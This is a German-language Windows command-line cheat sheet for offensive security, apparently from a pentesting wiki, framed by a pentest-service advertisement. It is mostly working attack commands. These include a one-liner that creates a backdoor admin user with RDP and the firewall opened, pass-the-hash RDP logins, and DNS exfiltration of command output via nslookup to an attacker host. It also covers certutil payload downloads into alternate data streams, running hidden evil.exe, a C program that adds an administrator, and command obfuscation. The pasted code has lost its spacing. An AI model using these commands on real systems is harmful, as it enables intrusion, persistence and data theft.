Erhalten Sie die Perspektive eines Hackers auf Ihre Webanwendungen, Ihr Netzwerk und Ihre Cloud
Finden und melden Sie kritische, ausnutzbare Schwachstellen mit echtem Geschäftsauswirkungen. Verwenden Sie unsere 20+ benutzerdefinierten Tools, um die Angriffsfläche zu kartieren, Sicherheitsprobleme zu finden, die Ihnen ermöglichen, Privilegien zu eskalieren, und nutzen Sie automatisierte Exploits, um wesentliche Beweise zu sammeln, und verwandeln Sie Ihre harte Arbeit in überzeugende Berichte.
wmicosgetosarchitecture||echo%PROCESSOR_ARCHITECTURE%#Get architecturesysteminfosysteminfo|findstr/B/C:"OS Name"/C:"OS Version"#Get only that informationwmiccomputersystemLISTfull#Get PC infowmicqfegetCaption,Description,HotFixID,InstalledOn#Patcheswmicqfelistbrief#UpdateshostnameDRIVERQUERY#3rd party driver vulnerable?
Umgebung
set#List all environment variables
Einige Umgebungsvariablen, die hervorgehoben werden sollten:
COMPUTERNAME: Name des Computers
TEMP/TMP: Temp-Ordner
USERNAME: Ihr Benutzername
HOMEPATH/USERPROFILE: Heimatverzeichnis
windir: C:\Windows
OS: Windows OS
LOGONSERVER: Name des Domänencontrollers
USERDNSDOMAIN: Domänenname zur Verwendung mit DNS
USERDOMAIN: Name der Domäne
nslookup%LOGONSERVER%.%USERDNSDOMAIN%#DNS request for DC
schtasks/query/foLIST/v#Verbose out of scheduled tasksschtasks/query/foLIST2>nul|findstrTaskNameschtasks/query/foLIST/v>schtasks.txt; catschtask.txt|grep"SYSTEM\|Task To Run"|grep-B1SYSTEMtasklist/V#List processestasklist/SVC#links processes to started servicesnetstart#Windows Services startedwmicservicelistbrief#List servicesscquery#List of servicesdir/a"C:\Program Files"#Installed softwaredir/a"C:\Program Files (x86)"#Installed softwareregqueryHKEY_LOCAL_MACHINE\SOFTWARE#Installed software
Domain-Info
# Generic AD infoecho%USERDOMAIN%#Get domain nameecho%USERDNSDOMAIN%#Get domain nameecho%logonserver%#Get name of the domain controllersetlogonserver#Get name of the domain controllersetlog#Get name of the domain controllergpresult/V# Get current policy appliedwmicntdomainlist/format:list#Displays information about the Domain and Domain Controllers# Usersdsqueryuser#Get all usersnetuser/domain#List all users of the domainnetuser<ACCOUNT_NAME>/domain#Get information about that usernetaccounts/domain#Password and lockout policywmicuseraccountlist/format:list#Displays information about all local accounts and any domain accounts that have logged into the devicewmic/NAMESPACE:\\root\directory\ldapPATHds_userGETds_samaccountname#Get all userswmic/NAMESPACE:\\root\directory\ldapPATHds_userwhere"ds_samaccountname='user_name'"GET# Get info of 1 userswmicsysaccountlist/format:list# Dumps information about any system accounts that are being used as service accounts.# Groupsnetgroup/domain#List of domain groupsnetlocalgroupadministrators/domain#List uses that belongs to the administrators group inside the domain (the group "Domain Admins" is included here)netgroup"Domain Admins"/domain#List users with domain admin privilegesnetgroup"domain computers"/domain#List of PCs connected to the domainnetgroup"Domain Controllers"/domain#List PC accounts of domains controllerswmicgrouplist/format:list# Information about all local groupswmic/NAMESPACE:\\root\directory\ldapPATHds_groupGETds_samaccountname#Get all groupswmic/NAMESPACE:\\root\directory\ldapPATHds_groupwhere"ds_samaccountname='Domain Admins'"Getds_member/Value#Members of the groupwmicpathwin32_groupuserwhere (groupcomponent="win32_group.name="domain admins",domain="DOMAIN_NAME"") #Members of the group# Computersdsquerycomputer#Get all computersnetview/domain#Lis of PCs of the domainnltest/dclist:<DOMAIN>#List domain controllerswmic/NAMESPACE:\\root\directory\ldapPATHds_computerGETds_samaccountname#All computerswmic/NAMESPACE:\\root\directory\ldapPATHds_computerGETds_dnshostname#All computers# Trust relationsnltest/domain_trusts#Mapping of the trust relationships# Get all objects inside an OUdsquery*"CN=Users,DC=INLANEFREIGHT,DC=LOCAL"
Protokolle & Ereignisse
#Make a security query using another credentialswevtutilqesecurity/rd:true/f:text/r:helpline/u:HELPLINE\zachary/p:0987654321
Benutzer & Gruppen
Benutzer
#Mewhoami/all#All info about me, take a look at the enabled tokenswhoami/priv#Show only privileges# Local usersnetusers#All usersdir/b/ad"C:\Users"netuser%username%#Info about a user (me)netaccounts#Information about password requirementswmicUSERACCOUNTGetDomain,Name,Sidnetuser/add [username] [password] #Create user# Other users loogedqwinsta#Anyone else logged in?#Lauch new cmd.exe with new creds (to impersonate in network)runas/netonly/user<DOMAIN>\<NAME>"cmd.exe"::Thepasswordwillbeprompted#Check current logon session as administrator using logonsessions from sysinternalslogonsessions.exelogonsessions64.exe
Gruppen
#Localnetlocalgroup#All available groupsnetlocalgroupAdministrators#Info about a group (admins)netlocalgroupadministrators [username] /add #Add user to administrators#Domainnetgroup/domain#Info about domain groupsnetgroup/domain<domain_group_name>#Users that belongs to the group
Sitzungen auflisten
qwinsta
klist sessions
Passwort-Richtlinie
net accounts
Anmeldeinformationen
cmdkey/list#List credentialvaultcmd/listcreds:"Windows Credentials"/all#List Windows vaultrundll32keymgr.dll,KRShowKeyMgr#You need graphical access
Persistenz mit Benutzern
# Add domain user and put them in Domain Admins groupnetuserusernamepassword/ADD/DOMAINnetgroup"Domain Admins"username/ADD/DOMAIN# Add local user and put them local Administrators groupnetuserusernamepassword/ADDnetlocalgroupAdministratorsusername/ADD# Add user to insteresting groups:netlocalgroup"Remote Desktop Users"UserLoginName/addnetlocalgroup"Debugger users"UserLoginName/addnetlocalgroup"Power users"UserLoginName/add
Netzwerk
Schnittstellen, Routen, Ports, Hosts und DNS-Cache
ipconfig/all#Info about interfacesrouteprint#Print available routesarp-a#Know hostsnetstat-ano#Opened ports?typeC:\WINDOWS\System32\drivers\etc\hostsipconfig/displaydns|findstr"Record"|findstr"Name Host"
Firewall
netshfirewallshowstate# FW info, open portsnetshadvfirewallfirewallshowrulename=allnetshfirewallshowconfig# FW infoNetshAdvfirewallshowallprofilesNetShAdvfirewallsetallprofilesstateoff#Turn OffNetShAdvfirewallsetallprofilesstateon#Trun Onnetshfirewallsetopmodedisable#Turn Off#How to open portsnetshadvfirewallfirewalladdrulename="NetBIOS UDP Port 138"dir=outaction=allowprotocol=UDPlocalport=138netshadvfirewallfirewalladdrulename="NetBIOS TCP Port 139"dir=inaction=allowprotocol=TCPlocalport=139netshfirewalladdportopeningTCP3389"Remote Desktop"#Enable Remote Desktopregadd"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"/vfDenyTSConnections/tREG_DWORD/d0/fnetshfirewalladdportopeningTCP3389"Remote Desktop"::netshfirewallsetserviceremotedesktopenable#I found that this line is not needed::scconfigTermServicestart=auto#I found that this line is not needed::netstartTermservice#I found that this line is not needed#Enable Remote Desktop with wmicwmicrdtogglewhereAllowTSConnections="0"callSetAllowTSConnections"1"##orwmic/node:remotehostpathWin32_TerminalServiceSettingwhereAllowTSConnections="0"callSetAllowTSConnections"1"#Enable Remote assistance:regadd“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer”/vfAllowToGetHelp/tREG_DWORD/d1/fnetshfirewallsetserviceremoteadminenable#Ninja combo (New Admin User, RDP + Rassistance + Firewall allow)net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable
::ConnecttoRDP (using hashorpassword)xfreerdp/u:alice/d:WORKGROUP/pth:b74242f37e47371aff835a6ebcac4ffe/v:10.11.1.49xfreerdp/u:hacker/d:WORKGROUP/p:Hacker123!/v:10.11.1.49
Freigaben
netview#Get a list of computersnetview/all/domain [domainname] #Shares on the domainsnetview \\computer/ALL#List shares of a computernetusex: \\computer\share#Mount the share locallynetshare#Check current shares
cd#Get current dircdC:\path\to\dir#Change dirdir#List current dirdir/a:hC:\path\to\dir#List hidden filesdir/s/b#Recursive list without shittime#Get current timedate#Get current dateshutdown/r/t0#Shutdown nowtype<file>#Cat file#Runasrunas/savecred/user:WORKGROUP\Administrator"\\10.XXX.XXX.XXX\SHARE\evil.exe"#Use saved credentialsrunas/netonly/user:<DOMAIN>\<NAME>"cmd.exe"::Thepasswordwillbeprompted#Hideattrib+hfile#Set Hiddenattrib-hfile#Quit Hidden#Give full control over a file that you ownsicacls<FILE_PATH>/t/e/p<USERNAME>:Ficacls<FILE_PATH>/e/r<USERNAME>#Remove the permision#Recursive copy to smbxcopy/hievryC:\Users\security\.yawcam \\10.10.14.13\name\win#exe2bat to transform exe file in bat file#ADSdir/r#Detect ADSmorefile.txt:ads.txt#read ADSpowershell (Get-Content file.txt-Streamads.txt)# Get error messages from codenethelpmsg32#32 is the code in that case
Umgehung der Zeichen-Schwarzenliste
echo%HOMEPATH:~6,-11%#\who^ami#whoami
DOSfuscation
Generiert eine obfuskierte CMD-Zeile
git clone https://github.com/danielbohannon/Invoke-DOSfuscation.gitcd Invoke-DOSfuscationImport-Module .\Invoke-DOSfuscation.psd1Invoke-DOSfuscationhelpSET COMMAND type C:\Users\Administrator\Desktop\flag.txtencoding
for /f tokens Technik: Dies ermöglicht es uns, Befehle auszuführen, die ersten X Wörter jeder Zeile zu erhalten und sie über DNS an unseren Server zu senden.
for /f %a in ('whoami') do nslookup %a <IP_kali>#Get whoamifor /f "tokens=2" %a in ('echo word1 word2') do nslookup %a <IP_kali>#Get word2for /f "tokens=1,2,3" %a in ('dir /B C:\') do nslookup %a.%b.%c <IP_kali>#List folderfor /f "tokens=1,2,3" %a in ('dir /B "C:\Program Files (x86)"') do nslookup %a.%b.%c <IP_kali>#List that folderfor /f "tokens=1,2,3" %a in ('dir /B "C:\Progra~2"') do nslookup %a.%b.%c <IP_kali>#Same as last one#More complex commandsfor /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('whoami /priv ^| findstr /i "enable"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali>#Same as last one
Du kannst auch die Ausgabe umleiten und sie dann lesen.
whoami /priv | finstr "Enab" > C:\Users\Public\Documents\out.txt
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali>
CMD aus C-Code aufrufen
#include<stdlib.h>/* system, NULL, EXIT_FAILURE */// When executed by Administrator this program will create a user and then add him to the administrators group// i686-w64-mingw32-gcc addmin.c -o addmin.exe// upx -9 addmin.exeintmain (){int i;i=system("net users otherAcc 0TherAcc! /add");i=system("net localgroup administrators otherAcc /add");return0;}
Alternate Data Streams CheatSheet (ADS/Alternate Data Stream)
## Selected Examples of ADS Operations ##### Adding Content to ADS #### Append executable to a log file as an ADStypeC:\temp\evil.exe>"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"# Download a script directly into an ADScertutil.exe-urlcache-split-fhttps://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1c:\temp:ttt### Discovering ADS Content #### List files and their ADSdir/R# Use Sysinternals tool to list ADS of a filestreams.exe<c:\path\to\file>### Extracting Content from ADS #### Extract an executable stored in an ADSexpandc:\ads\file.txt:test.exec:\temp\evil.exe### Executing ADS Content #### Execute an executable stored in an ADS using WMICwmicprocesscallcreate'"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'# Execute a script stored in an ADS using PowerShellpowershell-epbypass-<c:\temp:ttt
Erhalten Sie die Perspektive eines Hackers auf Ihre Webanwendungen, Ihr Netzwerk und die Cloud
Finden und melden Sie kritische, ausnutzbare Schwachstellen mit echtem Geschäftsauswirkungen. Verwenden Sie unsere 20+ benutzerdefinierten Tools, um die Angriffsfläche zu kartieren, Sicherheitsprobleme zu finden, die Ihnen ermöglichen, Berechtigungen zu eskalieren, und nutzen Sie automatisierte Exploits, um wesentliche Beweise zu sammeln, die Ihre harte Arbeit in überzeugende Berichte verwandeln.